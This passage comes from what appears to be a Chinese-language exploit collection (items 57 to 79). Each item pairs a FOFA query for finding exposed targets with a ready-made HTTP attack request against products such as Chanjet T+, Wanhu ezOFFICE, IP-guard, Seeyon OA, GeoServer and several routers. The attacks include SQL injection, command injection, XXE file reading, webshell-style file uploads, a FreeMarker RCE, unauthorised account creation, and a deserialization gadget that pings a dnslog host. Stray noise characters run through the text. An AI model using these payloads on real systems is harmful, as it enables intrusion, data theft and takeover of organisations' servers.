"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 m% [* g" a0 X# f8 {
"StartInfo": {+ ?' v$ @. N) g
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- K; t% K/ a7 |5 A# X1 ~7 N
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"/ H6 y: G. Q" ~5 O6 D i/ X/ t
}
7 I3 ^' t( C( y& j0 w! t }9 `1 o7 M- M4 h$ E2 m
}
8 d" [ {/ |- s' e# r}5 z u5 A+ _( J/ ]) u; } F
1 A9 \& n9 N: s' o/ o% x
, S$ i* J4 ]* U& E3 M57. 畅捷通T+ keyEdit.aspx SQL注入# ^# p; k$ P d' u3 N: g& f
FOFA:app="畅捷通-TPlus"! P, S# R* q* u' g3 _; i, E
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1/ `" s2 U, ]9 g
Host: host: }( i8 t' J9 K5 g _
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 R6 {" N7 R* M, l0 eAccept-Charset: utf-8' r& b, e. Q- H, G
Accept-Encoding: gzip, deflate$ W& v+ Y! x' j: O j2 @
Connection: close, k' c- Q4 Z/ }- p/ S* h# Q/ ?
/ w" U ~7 d5 @5 P( P
7 ?& e2 ~7 ]. R58. 畅捷通T+ KeyInfoList.aspx sql注入
1 _# v3 S7 B' c/ d! J# gFOFA:app="畅捷通-TPlus"' r5 S, _; c$ a: l% N
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.16 ` E) ?$ L2 [! V1 Z
Host: your-ip, x( E D s8 _9 x2 S& w! h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
% y6 y5 Z9 @: V+ @/ a& b. vAccept-Charset: utf-8& q# ~7 H. ~& C ^
Accept-Encoding: gzip, deflate
# G. `1 k7 G2 p% sConnection: close
0 @) O+ O/ E. e& D; m
2 q- P/ z/ T6 U# u, f# ?
! R! @; [0 u Y( f* k: w/ u+ k* {59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 N- |% r) v& u, h' I v
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
2 G* ^- h- {4 BPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
/ Q% E/ m7 Q+ a% Y( JHost: 192.168.86.128:90905 x8 G! X7 [2 r. ]
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
& |4 v6 H8 X5 `% [& e1 U8 yConnection: close
5 N! l5 O% n6 w: i; lContent-Length: 1669/ L0 q& I. J/ t. s6 \- d
Accept: */*
! ]$ h, D( z5 q8 dAccept-Language: en
" Q' v0 ^3 e! }1 K: b F% dContent-Type: application/x-www-form-urlencoded
1 ]8 Z" l# F: d d9 N# s. e' nAccept-Encoding: gzip( N/ w/ W2 q: A0 N; e, Q
8 i9 t; R! Y' e% |& ]% e0 ]' {
PAYLOAD+ \8 p4 G1 Q6 g) e) c" f
! Q2 D T) J- {0 p
1 B0 q2 n1 ~* Q60. 百卓Smart管理平台 importexport.php SQL注入
/ e! Q: M. k' e9 |FOFA:title="Smart管理平台"
' g z/ N! g* oGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.14 b" \) B& w: i; d3 D$ p
Host:1 T0 t, }' z4 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 \& h: P; F# W- F9 E. d; w5 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 K$ Q( u; l. I0 e& l! @Accept-Encoding: gzip, deflate
% F/ ? w; {) x, B7 w" FAccept-Language: zh-CN,zh;q=0.98 x+ ~1 D' s7 A3 }3 ` ?1 K
Connection: close$ O9 c3 @2 U) L; G
2 v' _( |0 e6 o [
+ V0 f5 A6 ^. `+ f% |& Y61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 S9 k: M' l3 ?: [1 t% c
FOFA: title="欢迎使用浙大恩特客户资源管理系统"( p9 _- J+ a/ @/ Y
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1( M- f; T3 k# y k
Host: x.x.x.x. J* ], H J% o5 {" P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 ]3 |! C3 n! }. I* PConnection: close$ B2 f8 a3 i8 |0 `/ w. J9 R% H
Content-Length: 27
- s( Z. Y* Z( ]1 y& R3 ]& rAccept: */*
9 l1 P/ Y1 a ~. z- O+ ^ c3 zAccept-Encoding: gzip, deflate
3 ^" Q0 p* ]3 \Accept-Language: en3 ^1 F) R1 \) @ ^8 w4 }; {
Content-Type: application/x-www-form-urlencoded
0 _* @" z4 H7 S8 X. R( W$ N' z* y
8uxssX66eqrqtKObcVa0kid98xa3 n z- o! J6 H; {. e
) N- [8 W' v5 {8 H$ j5 G: n
/ ^) _3 r5 p9 V0 Y" x$ J Q62. IP-guard WebServer 远程命令执行( S1 u' A+ y i" C3 a7 c' a( M
FOFA:"IP-guard" && icon_hash="2030860561" ?* o$ o" r$ P% m+ D) m
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 M, d( w: J% `8 {/ _: YHost: x.x.x.x( {* @2 Q0 }' u% x: g
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
% w* ]. m/ z* T7 H6 xConnection: close
# J2 |+ | B1 n# y4 Y# S' r4 nAccept: */*: g* j9 a; L/ t$ q
Accept-Language: en
0 ]$ x3 y" e+ I" R3 c+ N- ]Accept-Encoding: gzip0 u T5 L2 s# [% K- ]
$ A7 [% [0 b# r! P. z2 s- Z8 g: \
访问
) L/ H! Q1 ]& L, I( k; D- B. O. L. `' B5 k
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
" @7 K9 y' P& k. b+ _Host: x.x.x.x
4 {7 P7 f# V4 p9 C, j% {8 |: i" K/ Q$ Z; W. k6 \' H, ~ R) \
; X& b4 G9 j r) |
63. IP-guard WebServer任意文件读取4 [- n, z' o: w. V# G, V& o
IP-guard < 4.82.0609.05 |& E4 O/ m% g) [; f9 R1 _
FOFA:icon_hash="2030860561"$ L: X. F; y0 Q
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
5 j$ u6 v) Z" E1 k5 }5 O! S/ nHost: your-ip7 ?6 K( k/ v! s' r2 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ E) ] w, s. A8 d$ M5 A5 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 P9 s) E) P/ E6 fAccept-Encoding: gzip, deflate
9 o# `: M8 n# c, N. i! B h2 Y" ?Accept-Language: zh-CN,zh;q=0.9
7 I7 @; o/ D* B9 v1 u Y3 P0 PConnection: close# A# v, Q8 Y' J' P
Content-Type: application/x-www-form-urlencoded& l+ E: J1 @% p
! [% e# F/ \; T8 q% ~' G) W
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
y/ H3 c9 s) G; U* Y7 }9 _& \ d- Q* \3 o" B
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; b, L& I; |- j, I) rFOFA:body="/Scripts/EnjoyMsg.js"7 E$ L6 t+ ?1 h# T- J+ k
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1& }* I: `+ Z7 N/ P1 F* m/ ^. Q' Z& M
Host: 192.168.86.128:9001
3 b% M4 K/ A" m! ]7 {1 _6 r& ?User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; ~1 l3 w0 u* D9 s
Connection: close9 L6 t4 M& A# ~
Content-Length: 369
+ M, x# J) {" a; RAccept: */*
8 B3 U" B3 O1 E O$ oAccept-Language: en
3 r% ^% V8 E* Z0 ^. [Content-Type: text/xml; charset=utf-8
% w% X( X% l I+ |Accept-Encoding: gzip
- F6 u/ R, v" {2 m- l, x
0 a% _, ~) D$ ~/ P0 X/ D/ G6 j0 Y: i3 J4 R<?xml version="1.0" encoding="utf-8"?>, q u8 w* z, B: |! i: w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 Q4 j: `* ?" R# N, U3 I/ `+ |
<soap:Body>" k$ e @ h5 F; H+ r
<GetOSpById xmlns="http://tempuri.org/">
9 s* y2 R' w1 ]# ?1 c Q$ e/ ^ <sId>1';waitfor delay '0:0:5'--+</sId>7 ~; @; o5 W" j R1 y, f
</GetOSpById>7 [8 w8 Q3 e0 `' {* q1 x
</soap:Body>
2 O6 R0 j1 c- ^# j( S; [. X</soap:Envelope>, J) U! i4 Y. `' G0 D
( t0 B2 |4 ^5 C* d% g ?
/ S" c! g$ x- b+ b2 t( C0 A65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 [! h/ r, g1 M+ |" R! Y( X6 K2 z
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
0 Q% {( x% G: b0 x响应200即成功创建账号test123456/123456
9 R7 P5 g+ f6 q& ?% U; \POST /SystemMng.ashx HTTP/1.1
% V' o$ g8 y c, }Host:
L4 I, K: l0 AUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)4 \: k- [, N# Z' W# @$ x% `
Accept-Encoding: gzip, deflate+ [$ b/ r# T& o' G
Accept: */*1 n* Q" d: f5 k6 @8 D" b
Connection: close
8 r9 i# s, h; b, ~Accept-Language: en
9 E5 |* S% ]: i" p/ FContent-Length: 174; ^4 U; k) Y# n! _% N; h. R* l/ }( K
8 r5 O8 l; H2 ~3 w8 Q" ]
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators' O! U p$ e4 U0 I& P X1 i
2 p8 A! y' y* K
^/ v6 D0 | A l4 v9 J
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
) u8 R* e6 u$ v2 k) o6 r" E* n6 _. QFOFA:app="万户ezOFFICE协同管理平台"* F2 |" }; K/ u
! A2 B9 z+ O8 n8 H
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.12 g0 a. | r. U* \0 T9 w9 g7 j. E
Host: x.x.x.x
, `; X7 J: q$ u% P, A0 L1 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ ]6 M/ `2 ^0 V) U8 h5 SConnection: close
3 ?: e* J( W* T$ B M- v2 l3 mAccept: */*5 V5 t) l# v% i9 Y7 }
Accept-Language: en+ [2 i. S' ^/ T+ Q( L
Accept-Encoding: gzip ?! c; X3 e' w- a6 W4 X' H
1 f$ J% C) d1 L6 N* o8 G3 R) P
4 L& m# F5 y1 {& d& b第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在% K: K D8 [( Y U
$ S7 P" r. @" G- A& O% O( S67. 万户ezOFFICE wpsservlet任意文件上传
2 s8 `0 k. H2 ?& E; tFOFA:app="万户网络-ezOFFICE"# h0 Q/ ^' s& h7 V; y
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型. i' W: @/ y9 \; I/ I- a: N& Z
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
( k, e }& @0 J2 O1 mHost: x.x.x.x
, Z' y) o- _* V& m; uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
; j" j" V& H* v& `' u VContent-Length: 173( c; S0 u/ C5 E& \3 \: Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
& ]- W6 g: ?8 W% S+ }% GAccept-Encoding: gzip, deflate
3 v: d; X, {/ Z3 C0 g" H# k8 `Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
* R) x3 u/ Z: n' q2 w( g4 lConnection: close% P# Q8 e* @# H2 M3 h7 e
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
7 D5 d( a5 C2 _8 W8 y% g% z( U% mDNT: 1
% z- @0 X: o5 v3 w1 yUpgrade-Insecure-Requests: 1
/ H7 a$ ^, h, D3 o1 m. r0 _4 ~! `
--ufuadpxathqvxfqnuyuqaozvseiueerp9 G. `% d( K% U9 s
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
" R% u6 m ?: q3 u5 c& N" q7 Y9 ?* F2 i
<% out.print("sasdfghjkj");%>0 \9 u' H5 d$ I; \$ p" L8 H
--ufuadpxathqvxfqnuyuqaozvseiueerp--( B# {" m& T: M5 m% S- X
) h! n) A& F, _& S% P& P4 H: n" L2 V6 G, x/ {0 j
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
' T! E# Y/ |+ }
2 n- u+ P. ~. I" ~) E68. 万户ezOFFICE wf_printnum.jsp SQL注入
* C: ^3 U# I/ g0 `' _8 R$ \FOFA:app="万户ezOFFICE协同管理平台"
" j- j* K9 o) a8 J- r) CGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
0 x2 {9 O# \( b0 J FHost: {{host}}
- G2 x( F! w6 t4 Z% mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
7 v( X& y( ~" `9 S1 R. ]" nAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
, p0 t3 k2 z0 D& h; V; G; Q4 YAccept-Encoding: gzip, deflate3 l9 O9 {6 I. n2 ~; n9 T3 `8 n! ^
Accept-Language: zh-CN,zh;q=0.9
+ ]! e: q" i6 Y4 f9 U2 ^9 RConnection: close
$ J" Y4 [/ Y8 G
* P9 }1 c# R) G3 G* m" {6 }! c) q* K; E% [& @# C: M
69. 万户 ezOFFICE contract_gd.jsp SQL注入5 Y$ U6 }* v2 i
FOFA:app="万户ezOFFICE协同管理平台"
8 x' U* m# a( F& g1 V$ ?GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1! i) K- N! F0 y6 l+ t; S* }
Host: your-ip! H" E5 w, g0 \$ Q; V' r# B5 T }
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36/ Z9 r6 X' o1 x0 i, r8 @
Accept-Encoding: gzip, deflate
1 ?3 y S$ K* Y8 C) l" |( f. eAccept: */*
6 }, j0 d' o0 Q8 ^. BConnection: keep-alive
- Y6 q \) z2 Z5 \$ E4 Z" w7 s. G. v8 h, Q
1 l) z& z: \# |& D4 ]70. 万户ezEIP success 命令执行: x$ K; ]1 B5 m6 T
FOFA:app="万户网络-ezEIP"
8 C& ?* V% {5 f% q% P# m( @POST /member/success.aspx HTTP/1.14 j1 w0 Q0 t* e+ R" |& A0 L" ]9 v( \0 N
Host: {{Hostname}}
) j9 u6 y$ \0 s' g, HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 f/ Q4 w. f6 F- BSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=5 A2 t" ~3 d5 h% b1 ~
Content-Type: application/x-www-form-urlencoded
8 l4 c# j0 J4 WTYPE: C
/ n/ B/ k) o2 A5 Y0 }. I' ]" JContent-Length: 16702
5 g6 G9 C. z% K
7 q: {& }/ J0 p X__VIEWSTATE=PAYLOAD
# G6 Z3 u0 p% \7 h" t
+ }" E+ {) ]* ~ h C$ F5 @/ K* K2 ~# u5 e/ H
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
! R0 |% v0 v0 E9 n3 RFOFA:body="PM2项目管理系统BS版增强工具.zip"5 O! K2 c9 ]; u/ g8 S0 l
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
( @# r. @- G, E7 ]4 X V! @Host: x.x.x.xx.x.x.x$ W9 U- {' v) Z, O, W8 V4 D2 `
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ e/ _/ c3 n* v5 z1 r4 M- M) h6 R
Connection: close9 @: t! V R$ G3 s& m' E1 K- Y( l2 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) i: e N% y: S0 n# {3 w/ j( E, v
Accept-Encoding: gzip, deflate
P) b8 c N" d' a' YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 }- i4 r! G) j5 w; l; Z; D0 dUpgrade-Insecure-Requests: 15 ]) Q6 H( m$ b( v, l: X
' N1 |, E. ]) j7 W6 ^ ]
# k6 B8 ?& c- ~; N( d Z* ]
72. 致远OA getAjaxDataServlet XXE
6 w6 W6 d9 I3 ^" G0 DFOFA:app="致远互联-OA"' G# v+ Q+ g# E# W0 n# ^4 {
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. K) f) Y( M" G6 q/ l1 ^
Host: 192.168.40.131:8099# z* C3 V8 G2 A9 U2 _
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
- F; V5 D& y/ l! E" k2 Z6 M# e% AConnection: close
5 R. s( ?, g% g4 M! J$ k* U6 s4 jContent-Length: 5833 J1 t4 h* K$ {( M( M
Content-Type: application/x-www-form-urlencoded7 m1 ^$ Y1 W3 \! v
Accept-Encoding: gzip
: F# F. R" j, T }1 f" z2 g8 w" ~4 A0 h
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E8 D, [: E9 t, |6 j; _
* B+ d! {" {( j) w" U ]
0 }2 b( `0 t9 Y/ C: }9 |) a
73. GeoServer wms远程代码执行
1 M3 y; K8 Z; SFOFA:icon_hash=”97540678”; r D0 h7 _3 U: Q- c. u U
POST /geoserver/wms HTTP/1.1/ R$ F7 w2 W$ F; L0 N; X
Host:
8 h5 {9 Y0 A4 r) y, tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% c d: f: M/ a
Content-Length: 1981
! u0 b2 X; B) d% J$ e# y1 TAccept-Encoding: gzip, deflate% ^) e4 r% A6 g* }2 l0 r( \/ H
Connection: close3 D6 \+ J0 K! U3 ^ r- p, y, u* q
Content-Type: application/xml
7 U8 b3 ^! \0 m# k0 JSL-CE-SUID: 31 C! G, h; E2 S" Q4 N1 o
, s) ?) V$ h: T5 H/ h& D. X
PAYLOAD% o$ i2 ` u0 u# E r( |7 T" [/ h
2 l+ |% n2 i1 [/ K: R% C) l. Y/ Y
. ]$ y5 `3 w- S8 o( v% x |+ a74. 致远M3-server 6_1sp1 反序列化RCE9 O7 k K4 g" q, X m
FOFA:title="M3-Server"
7 H- [5 l* T+ V! k4 iPAYLOAD G( K# e4 z& h; f! G, k
' c; M! x0 P7 P( e75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
, d0 B2 }5 B' ?$ u# Q+ GFOFA:app="TELESQUARE-TLR-2005KSH"- L9 _) _- s; S" k3 @1 L3 L) V
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ X" I) x1 u2 @$ FHost: x.x.x.x+ ~ x8 T' N9 P* b; `% m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 f# e$ ~- n$ m- VConnection: close2 P/ _8 h8 F2 F1 Y
Accept: */*
8 y5 K7 Y% `4 [6 m1 ~$ pAccept-Language: en) v" W' w6 J/ }, p: S2 x
Accept-Encoding: gzip& X! `# o- W1 z/ K$ z; R- a$ c
* _# i& ~7 ]7 |4 m3 W0 }
+ k# C4 s! L: X! u m3 r& h6 F# {4 lGET /cgi-bin/test28256.txt HTTP/1.1
7 s) `, N6 F2 ?) B# @Host: x.x.x.x% J% V6 L+ s3 e3 V/ \
# l/ o$ W1 \% b4 _( w
4 V2 K+ c1 W% J" |0 Q) o7 y76. 新开普掌上校园服务管理平台service.action远程命令执行
" u* z4 T! m- P) ~FOFA:title="掌上校园服务管理平台"+ M* E9 [( O( W7 u2 g$ w7 N1 F
POST /service_transport/service.action HTTP/1.1
6 z# f, \& K, j- E; P1 {; RHost: x.x.x.x3 H& ^' S3 Z/ }$ p* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ T8 B& K8 T! R
Connection: close7 x5 n- B8 f f3 Z" o
Content-Length: 211 N# h" @1 f# k9 H+ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 A( c0 s A8 ~: j; ?2 xAccept-Encoding: gzip, deflate
0 j" L8 [7 ?) c; W6 l. ~$ M$ f2 D9 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' c2 l9 ^* h1 F5 F! `6 c( F8 v( oCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
) f, u) E/ g8 E+ i4 M1 RUpgrade-Insecure-Requests: 1% [ O$ Y% N0 I1 T: r7 ?: }
9 b4 z. _0 @ K6 I4 r! y
{, @, Y9 l" g5 x
"command": "GetFZinfo",
X# ~# u9 ]7 z) [4 C( w "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
7 i" e& R7 M: F( ]: s7 w+ @ ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
1 U" s* k; k& z9 O}/ S. r* j, c: L3 j% X, X- p
. F+ ^; w, z: L! U7 u! P9 Q2 b
% w# K, n9 v5 E
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1! M# A% ^" e1 b, l+ Q. r
Host: x.x.x.x# T$ m4 t4 H% {
+ U x, ^" y8 O" v* T9 X5 }' K5 y' [0 u h7 S- E2 v3 F7 T; B
- S7 n% O( z/ y
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 o: X: O, [* I* D& O1 X6 D4 |FOFA:body="F22WEB登陆"
8 W5 V9 |" M3 M6 ?POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
& A+ i# O" \$ F, X b8 [Host: x.x.x.x. ^0 a6 p0 e) D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) C1 g3 I# ]4 X
Connection: close
4 i9 p. p- X" }& t UContent-Length: 4332 a+ F- Y; q5 ?& P
Accept: */*
& U* F1 z9 p$ _6 q$ ~% AAccept-Encoding: gzip, deflate
/ t0 l: f1 F. A* V* p( wAccept-Language: zh-CN,zh;q=0.9
# b+ y) c$ M4 K1 J$ ZContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix8 d" m: U' Y3 F- T5 K
& ` ^; r6 V% {% `$ A
------------398jnjVTTlDVXHlE7yYnfwBoix, B4 {; M1 v6 a, {
Content-Disposition: form-data; name="folder"
5 \$ i9 O2 u- ~: t6 ]3 u9 {' y; k0 ^3 k
/upload/udplog
# m4 G/ K7 q" p( r% z------------398jnjVTTlDVXHlE7yYnfwBoix
" O I( _/ ] S L( q( w3 xContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
7 u/ l! U1 x0 I( g. lContent-Type: application/octet-stream. z: n! @" E8 ^$ Y
0 R% g a% J# d6 H4 S% f) b
hello1234567: @$ ]8 q2 j( f) I& _1 n; E, s# Y
------------398jnjVTTlDVXHlE7yYnfwBoix; D# R/ L& l& Q
Content-Disposition: form-data; name="Upload"
3 x; O# A0 W* k1 G) Z$ F
. L3 a9 g N$ Q7 pSubmit Query
$ e+ E* ~( H) s- B------------398jnjVTTlDVXHlE7yYnfwBoix-- h1 O5 E2 V/ W: J6 Y8 k x! X
, R8 T1 `3 W- d9 ], }. }& @; Q
* c- ]1 n Z6 v& w. f78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; u9 N( h. v& `! D! g$ i
FOFA:icon_hash="2001627082"& r( B! L7 c6 L' i& W9 d& g+ z
POST /Platform/System/FileUpload.ashx HTTP/1.1$ p: T, \3 F0 w8 Q( i
Host: x.x.x.x
+ q7 S1 Y, A0 u5 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) d0 J( n% Y0 n7 X9 Z/ X8 p, i) ^- FConnection: close/ ~" n$ ~; g% M
Content-Length: 336, V0 `. Q! i+ v; r
Accept-Encoding: gzip1 s: |) k, x& {) Q! U3 K- m4 y
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l1 v% ~7 C8 ?! }
6 l$ |6 A2 N: n. w+ J/ a1 r------YsOxWxSvj1KyZow1PTsh98fdu6l+ D. t, f4 p% ]& x- H* b
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"1 W3 T: y- ~# Z& a: |9 c$ A
Content-Type: image/png
9 q* K2 i* F" A1 k# X8 H& j% \ x2 T# e5 v
YsOxWxSvj1KyZow1PTsh98fdu6l/ u8 e" K' O: |' l, y4 w5 M
------YsOxWxSvj1KyZow1PTsh98fdu6l A: P8 P1 ?6 O" m
Content-Disposition: form-data; name="target"
# x* L! q0 h( C( \/ l0 D% c* H$ j+ x$ s8 G
/Applications/SkillDevelopAndEHS/, n" [1 h% ?% Y5 n
------YsOxWxSvj1KyZow1PTsh98fdu6l--- N. i5 c: C& X
" j- K% M) ]+ q2 i0 G
! w- _* [' u' Y pGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
0 a }8 N o* NHost: x.x.x.x+ K' P8 _+ C, ~* ?% f
0 N1 y. Q' x- d; j
e6 H5 H1 I! S! i! v2 D [ u) P. e79. BYTEVALUE 百为流控路由器远程命令执行) ]1 T& H9 D3 |
FOFA:BYTEVALUE 智能流控路由器
9 y5 }) T! l% b5 b' f/ j6 RGET /goform/webRead/open/?path=|id HTTP/1.1
